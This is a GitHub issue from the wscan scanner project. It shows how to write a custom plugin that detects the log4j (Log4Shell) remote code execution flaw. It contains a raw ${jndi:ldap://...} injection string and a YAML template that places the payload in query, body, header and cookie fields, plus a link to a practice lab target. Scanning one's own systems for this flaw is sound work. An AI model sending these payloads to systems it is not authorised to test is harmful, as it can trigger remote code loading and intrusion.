Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

How to use custom plugins to perform log4j RCE vulnerability scans? #19

Open
chushuai opened this issue Jul 6, 2024 · 1 comment
Open
Assignees
Labels
已上线 Already online 文档 document 追求极致 Pursuing the Ultimate

Comments

@chushuai
Copy link
Owner

chushuai commented Jul 6, 2024

${jndi:ldap://xxx.xxx.xxx.xxxx:80/i/hcSvqI7U/71534c/303r/i9nl/PQ5P8iBh}

image

Target practice location https://zkaq:zkaq@d63bb2586.lab.aqlab.cn/

https://hack.zkaq.cn/battle/target?id=5a768e0ca6938ffd

image

@chushuai chushuai self-assigned this Jul 6, 2024
@chushuai chushuai added the 文档 document label Jul 6, 2024
@chushuai
Copy link
Owner Author

chushuai commented Jul 7, 2024

name: custom-reverse

set:
  reverse: newReverse()
  reverseURL: reverse.ldap_url

payload:
  -  ${jndi:{{reverseURL}}}

placeholder:
  - query
  - body
  - header
  - cookie

expression: reverse.wait(15)

detail:
  author: shaochuyu
  links:
    - https://github.com/chushuai/wscan
  version: 1.0

@chushuai chushuai added 追求极致 Pursuing the Ultimate 已上线 Already online labels Jul 20, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
已上线 Already online 文档 document 追求极致 Pursuing the Ultimate
Projects
None yet
Development

No branches or pull requests

1 participant